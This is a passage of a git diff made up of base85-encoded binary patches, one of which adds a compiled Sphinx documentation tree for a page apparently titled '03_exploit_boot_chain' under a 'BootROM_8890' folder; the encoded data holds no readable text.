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

literal 0
HcmV?d00001

diff --git a/documentation/_build/confluence/.doctrees/BootROM_8890/03_exploit_boot_chain.doctree b/documentation/_build/confluence/.doctrees/BootROM_8890/03_exploit_boot_chain.doctree
new file mode 100644
index 0000000000000000000000000000000000000000..ba5d3f1484b03307415c757b148a963590a2bdb5
GIT binary patch
literal 57638
zcmeHwdu&|SnV%g!Nj)q%2^~kab4^7dDU-vQAth0?Wk+voB~hwKMNA!MbZ6$yOY_Ry
zJ0h9b3vbgj5%wZ!kV*4sf?|sX?IPWFchk)x?H^m92+|a2vB7S;D6s9KLDD?-iS&<V
zlkB#??>mos?w#S~kfI$Yp<oYZ?&F;AeCPYV^S#b@UfJ=<L;vdm{^vjBHcRFDa>CB%
z>y5nQcKqG>My_3R>R#s)ov~l(yxbY}2U_-$+i16PPRD-$PvlDFYQE*vJ1=(p{q(q3
zuDS{N{w~+adF4i3zh2r=+F9E5VrR58;P3FtUez&f`4698ZdMy*&&oC$o|P-v<$8yn
z#>3keoMnQd=QAJb2-tQuZ9w96N(cRcj0U~5&EF{@p7Xa?%XOzS*UsAhpzV3Ba<=VZ
zq%^W^<-ALy*p;i=u8WKKzN2o}#JAn~b~E^qwR3k`PJy0j`@1~5NVhtrhf0S^drOa%
zwv`_D-#b}q)SSsmqi%a8yFS@$H7dY{JL%drw_Pu0+!K=uMw^f{DS(_jgTddpb~Q6I
zb22%ZoXR)?DH%dahLMtJxftXVm$$XEK+OO~Z5La1vt;7(*@aTswQ$R`FqJtB)Nw7Z
z<QTZM8U?;``}X<em3qUqsK?v4t@*~;1mk_QG~^%cznzYp2OwcmAYrcb1W*kacU8-t
z)3U23gbzjf6;nOr?=he;nmlPXX_wxHDJwk*+Bl5=kKq3i{6B{2C_Pm=K@gzdA%BM$
z%qoC6v8_y$9xsgp%iGnY3T&5a%|^?!4W20N@TVC|K)7A4S}s_iYPIWmrv=>Kb*haf
z@sMTL^VSmG!X(y<j=*s#As7psag%9%XoHOfW4zTrrqmdBV~q1)idcmF9fb&i7@FBV
z8hFXp2h;`sz(uD{Q*JfxI<329XGzU(_l*GbTK}LEuT{k3JWYGz!P$4!sWn<FR@Gi<
zw81?jR)+k@)c}xRULPPIFaX&PK=h>g7cV<b6Kn?BP>8U~b*ok;VkkLvtL51Fa=nO0
zT8(zG6y;IL{gPOQHm|*4tbYGvRrEs0=P@%+Y{Qyha`w_Q<w6Sr(Q;e4Q^SeGWXAO%
z;&PMtle?1vA7l#cI<E|FqU6=8!{Cd&S2{JEN+ypCTP3GlEP4DZ*<2pBxUp=b1%^5`
zoW$>H!}d;%<iJ!;YvkEyCPjD8s#*Q1^)GM=+<eZB;U#}(q0y?@UdP`~gYWnQ%eCsP
z+q7v--Q8?CE*QpPN%mPOgANAx4uqD!uf{YzA!*uHvQXVn#BQ6yaWKL+M6NMxy!&($
zE0>)sDdYwh0t)&{{}e=&^JRluhD>f*{MQdY@W7?I1^og{QufLaAGYj&+*)$*U(2y-
zcD)TbyTVHuv5pYBb`dLFq1C7{3+0_`yI6Eu<1BV7?OKzb%$HkOgXvWeqUAM0k6NQk
zWv>M3V6|Prk&bn9{)~n3dyQP9I+n0l%rDulm2cD?djF2#ZU=&1^ao(dcX3N_Gc^`o
zbjK}d9JmH~kacpzBoL1)0IX0b=h{`Q5(N;ob>_-c3ZRQ6`|8!3cpzUN!QE=Lu>|<2
zZ;~97OD(Ld^sClzJ&TFR9k-x{c{GGZp}@$rb2-Q5m#ASY-)_-eR<mrp1x3YbHp+D`
zVV#Ctsy2B1Gz)rIxaqVCAW@QDG$de!+EjvR@wc|7E@tY!`O0Trmy;Lp@Ynk1VYLc8
zqIlWlVgH{6x{%wz8n;5^0=5OkGockrM5#Gg7?Ap41Wit)9w)3@lFPl;3NzvT@fh)H
z9ma%XyJfI_f&ONzO7|N2838t!rT@DAS$Z^>C1dT_t>kJaST@XShB_TxF-T;`tQdR9
zfPoTB@>nezp=-ft{-XcU(7N%b#=7xXh~~a_(Gh|+*JzQ1hvBmVB_WRmq0!P37*>^p
zORN*p60-{BR&5EUBfeA}NKd@N>xi_A$Si`$&E~5UXq&XS6{}pM;Z3SHUF(^W=QZ8g
z$;l#Ux}8nr8nsEgZr3X|R`XOkm6~+e$fCw3#Mg;%o6p|P2w_TQ*UeXDK!!Q>6BG4h
zMZ%l~m)4<!C|e(P&HG++6ex;0Dy+bMa374SvJ;DtIk43Y8h<;R?EZTC@pl4ASUNlY
z>HD5-Qtv9;3EV@apMaJJ{GFcNDmsCy1?WGw8Du3es_bR|s6mHe0-O*;J)w!(5Dms#
zYq0{}lEOpdtMUj2N&|ii{`!NO)bgFn56bZm`41+7i7bW4GZ0%!!&N<ywXasA$CZR&
zZ0_)E$a#a7mE$R}Q1_GmL;7M^Rz)vsaaB3dH+2zQ4@uqqZKXq%X&S$n<RZ+xW)HaF
zB!Q0UHl1A8%~h>(xZfI8Hk~?`pCtVL5<z&Va*?~MT*e<|kBi~2+EV2vo_&?t0B!Gp
z3Sj5E2R7huYc)*UQOy!wfpynf>3$_Jt+!u*xK{E){0Qc1i7>&QIN^j^T@siyGz{c<
zjJ(+AD=ljMP^H0-R$Tmv;5mSD|2({m^&-sww$}_i57Em3<R7KB*A4k$fb**i&Za^B
z@Rjl%N19oJN1jvI?sY2|!520(g12J?|8%`0h!qW$8Ub>sQt6}Bl6X{b4pVHlk?$tI
z(MlZ;h9`S8o&X+lNzNp)<$5ATp9+Uv*8>FpJ^{0C5;%gP{^vf1Dv9?$@uTsu4~kV7
z=4eWRZC(l>{?3LVeg`1_*5*RI%>b3Z2QdEahF}~4j6Ys4jD3;i*SOXDBB=B#1SPHq
zLx1888zHDs4E+$^T*EP}q~Tlm(RhN|#r}sQ+Az?+16Yr32-Y#cn%-Pkw-c<2?8T1&
z$}1a!@+hFZv|cD*D`J{jg_y+kVCdBi4gDz$z1;uM3;bw2G2OgbciSx|VV!N%Jp>Ek
zV32EV6)V@QwQ%iv=G>)sWlo>HayfJL!r9F6WRl&1r>|eTa^;%1C%)deIhVP5ZSK;-
zwHs>2U!~RqJbrLPcpL{FU)fwdg0|CoX%{~NC_lR)C?^2rr`8MQYeneOs}Q=l9t{28
zZfNKU4E=ZeANs%HN8<_o1x?_HVZqyrSU5c3@WhHh0)ofF&8-b9cJ(&N&xWaGKd*QI
zp_f*poHyT8<o>Gm5#aP28^Y-%aQa_17pDg=JFU7?W#mjk(obm)=y4~2|GOK4KMDB1
zy<Yg&!4C0{ew7p-WfiXesK1>I&<@fHU`d`A?+C*+c!#ni(t%&Vu)`~9enUCwgw<ud
zxQDdh32ABvK1aT+EO6~PAe$`eb|jBqjN5U?#dfoz%|ZDqn71dltw#fbx3ThseuLx7
zQ*6I)hcnsqD)?Wx&HaWPH3|5;Th5Y`P1LKC=c^U_PPz6xUn*DXPJMD-W`N9}fX|Qo
z;uKHOk(MQA1UUj(2Vocy8OGwK0#$d*2*Bt(0z6Y|+$Ar$4W|MEH$9?GB4I=@xi(5G
zQ#3Y&z(*@PFl)-3@!xsBgHghy3;i=1nQNKj$}uOKs0;x>|Cr%#>mR#@kF9bH0JO7}
zN6q2RY;@MdFttk!Jdp}`!rxJ3O4P(0xWS$$Afy|tG6GP@{Ut$z)3?}z77#evd};{T
zg3w}GngPScx!RCmQ%NyG<DCtY)OwVYC~rhl;^GlVMZrOJ$AP~dqz<yqw#yU><yfSh
zck)(*2PhKD=@KfyD$^t=NIZh@Yt}(#h2)J8bD?<(wUVb>MN285DFW%}MY1CCnGx-+
zI~3});rEvjS&p+(Kw3tr;U#IiP9ELk0U6O+vR71wm3W+<;CKYvKnOBmZAQS=i1(sF
z#9lFQ9j-Nj=Xfx!=hO*>At?4s+)sg8<gDSnyLP!seoqkyM&o91m*53X0EF2pVLZ8<
zN~M$ZkNd!LuDyh(5F6%5wHz+G<uPPeI6j@QAk+xg6q2SUIRvfqqac)uoIEHd6*C&{
zSmIZ-4I$_(I|y4d^qd$&EmGtgw-Ck_p^?(i;>e~G3|MT7WPUD5CXjQ5h@6X+TRNn0
z(hy#z)ba)86NTQsjf~PeZmZn%65g_h^hpXL27$Z*<`H@_h;CH82sEV`y#ycZYEZ4I
z`$8QVt-Ta!Eq-hyyQzPSXUN|vp$!lf1+BjY;ps4<27Ca^37?s4wUN7Hc<~pnVA;EJ
zY3}m;*&COxFA&ZK2bJ!FJh29HSsm+?6iFnNo;Gh&+K#>nd1c(>c!9o2!tCk6!J562
zbux%^Wn9N=H#3wo!_UzD<As?SG_aIIl5I0dNop-G<F#x!5~vS)<iyET?&(2#ABmiG
zFN4g@d=>dQ`aTkgo*qQlF5}emoI-;xa(6S?HZ3y2WA+I=CL(Vcw@OJvs)h849Do=s
zcD+X;IR%den$P5I&!z_)<Q56|`R+9CO7hsk>t^Fs@B|3^AAwt9^Z9nb3`gAjp1;3@
z#KkHlFJ`d#QCfNFUzUEu-(5w%ZyR)tjK8eymRK+C5Z8(f<5OYo(aMqk*lAYkNy@k@
zwJfZ&L^a<fVs@*i44Lrj5t(2}nEm0#lz15odNA7gtw=j-%NFW+71<I6sz2E>7s5{E
zlW1Q{%YQ%r?yG06U6}`31_!U6zk2P)yR8olTKGq~9;2<L<*`}o+Ko#WFU>K-1!~Tf
z^K%y$o);Iv=YuZ~4$hxHyKw2+-29+uArX4xX>K(^t`{p|&B|V=r=z2M_2?KsA+Hd_
zhOe|5#<iENX93{gAP7VxBLD0UM6=7+F+umkE|q_d26{8f^$;lp<P(@&#%_Sh4YXsc
zJpoZ~!j!bX+F7HS14WUuKA}>z4XaMw(`np6o`dpM$gLm!q@xd<llh`L5@K8lR^va%
z5KQwdp8d#c@qPUUgONAYmc>8D+AHi0m0c_CCf<O;I()GK$08XRFbfK8m1WDfu$O_&
zqFc@g)c!h@eraJLH&i$%>ckz*5>lRKt<;!yVAz3kBR$4e9rPiXS`B0Y)?vZ4#jX@i
z_k*IO`ngnKiv?L!&<OA_=i2r*jR0TB93)@UI4;6=C}PPZyTxiXC^fhNJ40+TBArZi
zb*9aa8(tXG8olE*J!^y$dq-4Hj1lTa>{B9RhBA|3`{`8PGWvxl2o4+a+2S@-A%SSQ
z@kXgVh6OrG_M>M(p$JSo&#7yyu|<@12vts<Y^A)BFsyB)Z*I~&!!r5>oat}A@@bxH
zjQ;gK+ku?;vF7@<+-oGORK}EJ$P37c80YGNOEMc@k*r#`x^DzP?cKg!;WeP&VBv*4
z%D_|Pe~36t$t?v3c?ZZ10v;jWzI{8noK7A;i530!ZFpnKUP;Ry((hqCkW)$98E|mW
zD@nYQ<#+hDx|A1}upt9kSsvs_btN$D4)+0$p-8<|4^7OFp^)thL9H-5phse~G8}0o
zemx*lkNRbG>>d4~!{{sqWayA4))dTx!9}B;>5T)ugXhC&s~?!ev_)W|i$*&aHV)H%
zY`icDA|UuEaDiqK=S(eQmK5QK2tF^CYFarI+3S#i*tw~=fR;MFBLj{_P&zh+v>e*0
zh!p}nGAg#T6ielN%Z3-zE#sNGH#V!#^xAY5;Of2WngAuS?u2j^vIQ3Rz%ht5-m_k^
z&YeGV^P=^VR>(;yUra)42Yur9Vv4^O<UhKS<}2xBI&~~RLl>s>g_)DnbYYq=@YiGf
zm0LQlzJ~ic!Ix80$8#V%Zf}OKNZCZ~om6iE906K7c>+%h00o5NyMRr67hvIgxWANu
zu0Rc^1bFC*Xr8YKC{OZt0h+ijfJ*Uo0S|eB>1SGj#IiKnUD^OIZGe~7;GqQpl4#Aq
zSX!eD&qzFVwJ!h@?<&C3$pXW6<;LXVlmaiEI+-Q>&R@qx0Tm`O=@gQZu(!w}xx7Ud
zV0=XuLIgpMR3U-l>{NE$DA$f@l=g7*P*Bfs=+r`D%FtmxEQwcW@FcXU9swkE5%Sn+
z$&d)-HQhoT2COvVyWDLD+0Hx2X+I<BJ33IJ_S2HA=e>!eK^#VzPVj6(|3NHeOc@IP
z>js`+Vff_@Eev-<7!MX+|A1UNC)8SLn)GT}HSUG?Jw?rF(nw>}<cH?5KM4AzZclo5
zx~>Pq{nWaKOBQ}dzrjlKN=Rq;L!mR+Rt{Tsv7xEjc1uD#P%v4p<J3e*&arY;2gWIE
zNNCYcwK|R+dQ5uyVUSY`@jckBcuFhSw5kOPb}z-6yaQ6XPA7A;s=#eYs<+T}bMRc#
zm5?SScGoHbMv$@9uGeAd3LS-ZMP**)(HRQj7c`bv)7K>ulmf;2I$twd`He^`YwPRO
zFYD{WQeTh3uF+8+;EG8IgG<+pR(@~e;C5;1eLy6LAPf;*Ga&lL#vvN%m%0LGjKUnq
zkvIkZ{RUGa#l&<_FFH_4U8h<|<njr-l`CcP*<ym#^Mu{@8X0$`o`awHf?ai;!L=UD
zkl8_d;@5bgi47+x72_?Bj!|r_pjkMh_<D3~mKDgu)_f0X&~73TLI@BR5a7Y*p5y1$
z`-nwBC;*N|)2WXRi&8g^$aI>VM?ON%ndB@ORn!Li9?Zfw{JMsQ(lJ5q!>#P_Sb`#S
zfSXiyg%4zB@HTh!T12knC|jA#YU5he3W$vNC}ziRjb?{0T$z7<c+5I%T_AZVh8F4p
zatM(}NAMaKsGt?r=twk7b%9V&hvB038CFs)l4I7XQ&x8PV)?X7Be{S)3?VR;^wfY3
zM>-b5RpUbTNtVDknJbW<_^Q7XdyHWNUG%LnrS5JKoS?off>XTuY7v}Pq`wCly_O<f
zc|RVyC$#9D%@vf{sCOza;o8g5VCYLBX=>=sM;79I98j3+P=2*PqtB-U+5gw;T4|I+
z!Vf_kmi<417k*WTM7KMF&G60iLoB|gUWmn>J_uIy*uSu;K8VFv)dR7Z?%V&s!a3Ie
zutfz}!f4t0#iRl)C3o#upOh4tBE4ngM?+F4&{9#tkqyvZ#;&}j^^mUcb=1}+!!pL!
z-G8B6hbpR88KuQXF9!m47zkKjEc<Qx4YqVYZCbjEzXR!d3t5XWU}5Qs#M<|@sTdMh
zneob~X+*_8Y>^8KS4lZn;>dQkfv6CxhMa6lR%wuX8cxU!iYg(^m8&(i>rncTRFBZB
zG|<RZLwTxHW`@f%QE-+tLs^>%W^mAq%LQ(*OAQcXH#n#7QUeN&DtY+g^_xOX75jF?
z3p_9YkHj+0nsu$aWiDr<-pYG!Srsv%GE<zhCTe9Nr?<d+1Qb4`b*?gEZr@&KKCX3(
zf@^B<v;zrU<ZMyUP7a-5;OaY^+UsyMTu0CrpWB+j`<+3<Qch}S>2g?bv@V!v#j1$b
zsf$KCGm&=Ic3Du*?6N4mW+W6ymFTboVHjt!e+B|nNtaLt(Eb8RwO;a5+|i7>ruZaj
z6(c_PTxTViE3~Q!30(_@_`<qogj|G+`VAJGpECugKP-FZ3S4mMabj%9>!;nr{X81L
zS=PO-Ckf&62E0-4$x(Pu$VGw7T^#~dl2Uj}L{=|c4b7FngdSVdld_fvMf+yDTrSlH
zRTWGy6r&^a9B8$93kN`9aoz*gkyRlwT{RrFym<ab=JdI9Hvpkd0D$8{e;*t?Y~7IN
zza~bVA+0?!D7uON@^E5IhJ7uWfa!a=UD&nJ?OsqwKc&8mBmD^FSxyD5!FMc@x8*fT
z-5$3hsmtmf^ue*g?(r&dM1x#_OGXcn62-6yhsq@DxkcS(IJxxoQSAcRq8bsj-J+U+
zI%23s2rx*YCCIPM^JDyzkX#FvC4Y}_e@swqZX*~aFN+01?;Vt>rBU4+65VKVKyjsO
zv=_P<j%ukI<-9mhhG@(>^(aIf(l1ligmp>gfXM_(wQ9vY5v&cLUDw(`YuKms8w}=e
zn`_wO<4_$hAaLch$~h|sWt+lNwyOFEHMC0Z*O8!x97#g1ppJT9BT!Y@7~supq`|_M
zYtc3kUFy{urNXcCsEXcnS6u6y<Ccr{Ta?F1*QXN6F$C2_1y+t~QS-cnQbs7ckcyD3
zLdaH!%liVbQLxrPhA8xZZb8?NrFH{yl~rU%5h*A-Tr~*AXVrj5T<ff?pGn!GwPw|!
z`r;TcvQGtZsTF+ja9@Z*#$#_(AqDbh99bAaKj;c5^<QYZTaOm=C4*w4TFkA%2Ogj(
zjO3e9T4To*t<GB66|7`39y2mB!r_7QMvk&9!6Z_Z^?S6n^jH$L9q4T&9xqFh<MaR*
zn~}tx`jqM?!R@N{Wgw%9;EklwG3%LA*45LCnd_(DedXHebD8-|fA>5h8S^E?g{7*9
zt-0mm@F2I8Yh#N$qD)99fZ_waW8w6Ti{}?I*DhR`Kff^l0xJ@tqT!1#Bwyrrma!#D
z?u?>H3nD4;uccmu<|7`&Xo*93a~5r^68o#TRdtQx*r%+Vx6*XnL@t967=^z$j#PfX
zlR>bJvieawd<l<1Z=tXX{extS4CX1T8`7t&8S5$QH~<2!Gi|g!mByPeX|X@KH99kf
zyR^Y$6uH_@!PG{XfYxYQgpCfnn*#t3hPsz?mZ5gL1{3X!-$FTd_4Mdy^a<;Tb@ut2
zbC-F}$MEaSm1}3!ufqa|hpp2h_{F<|m0&}#UK1hrqi&p1bO&UNj&{L3VVR^iW*tTB
z>^<0UHynzyna@ysE!qso^HTjTa<$=05%pdZ);ysEU@f&8bw#U)`;~EI1}q)0g@O>`
z8(tMs=7r#H7kL1v;;qmN%r>XeqloQ2#b2Um<Ljc|7iOcZL!^sUp|*k!b9cZYT!>b5
zNDd-ecF<Q>pHER3@jc7A+%S+b8cYOejnH9$Hzsg}&?Nw^;vf?@n@WhkV6y5Rv6B(Z
z!U88Db}l9|V54)qk>hzdzN$_}ZfP91&d;5@e(loSLgvg(luNpHbAd{gYh;Xfb&o3J
zg4ePus5>)iupt&lsQ1KqQqC}pU^-0L`Bn=~If;2fgq#l%rIODZZ6z?j*dKz~j}G6M
zef2yf08Nr;E6UW}EdZx87Ut;&%IISUxL{=|-cTL@0P`TAEMQ0dLaXhFpg9e!T<8`W
z0S{Tvp6Ve&$k7-9>Y47xf<CC9EOeVY3<dpSp-NPoacWI(C75A>ZF(fq0mvx;OShB5
z=x`^cFLV#*SyM!YVTyDCnHydUCd^l@!<c-KKcposRZvkp2Rx^HW&?P%F#G|)^s@DV
zlCwM-Zf@*l2nBw;<<R~bqM1|HXxwsxbt5X%Bjl(WdQuRjk|Mf?am(EQ16+`5#RpK3
z+DGdM`;Wy217c+^zaThWP#-X=TeF@uBx-=mK4z1gAD|j;T@m>>>YAOq1{JnJT4E8K
zm3f~N_7ln^joxH1IvT(;IcWey(l?MZ1|>y_WF1p=*gC`Y9&TK_F84=?8EiDg2}U%7
zQsR@C)2q{jb$pD)>hbB=8BV@PPZ>?fl~&=Xhb|x`(yJ*hTWWYhSn8jUhZ`4_#O_4%
z8kK^+T5yWB>e2>V+)^>ORLo7$ahXk{dKRsOA$>Wj2?^%jQZctwOlXu_DrTTHk8P=#
zq>a$OEftduRjq_=shBWUwp7e@ic76izIH06j*onKjrfSKHcR!`AVr(0!r7mZEmOY}
za-bS%pWj!zVByq}9#k%(K=~$Ahk|o>IE>BaHG+^e<x@bi%>ryQoM!^(kM{deRXel=
zy&5$iV49*hgz(*~C`tm6j=<Q%CKPtosJlqWvD_LRIcL|9P~)i@f8_b6qBB%GqlLtq
z7FGK*tw!yrXFn9evbnpcupy2?glO>O-g0bn`LmcIi;@gKPlFCz@BeW_uJ=D*jdE_k
zv%B`{EbL~?KN(eG25_#Pg%d&5ls#wNqWkRd)@KQ-sf|9XB4Dq6M*)uh+lFxTmmwS(
zp~FWw!ZeYZP}}5Ga4)FP`zSxc5kR$HE_f&=ut*WRn84z`c@8X+6WutnA#ybs_g}7S
z+!R3kGyMh!5Px6>5dB#y%Qvq1Q*NNQJ){!SRyaC!vPwC65G<(0LJ-ndA_Sdbem_kF
z<N6y7<$A(R|Hl{~#)ZS93gse7;TwhajFWWuTqom}KbJ^AD$)zHv+5`_8k=y=pk`kx
zfieM0<wnB2%P#6!_B72};>cBY$DP6R!nZRh_&}AzjpkkX+xW<=33>qnQk-io&re&m
z(~dugTtYA$BD+*a&42J{r}Fqt1nB*}4S3NhODn_et_eSHFgSo$fwO(|M-*NAA>(aV
z&Td9dDE9}0p(zeGF9maVgj(zOn3l?6qi+dHD2k6N!c#%~URBoicQEQZ{!W2=9?c$V
z>WRxgG^l_^#Ut7S-+vYL2&>ppY|ME;4g+*2gGAYyaohj+HSN?Se<lUngo{aUL+0v+
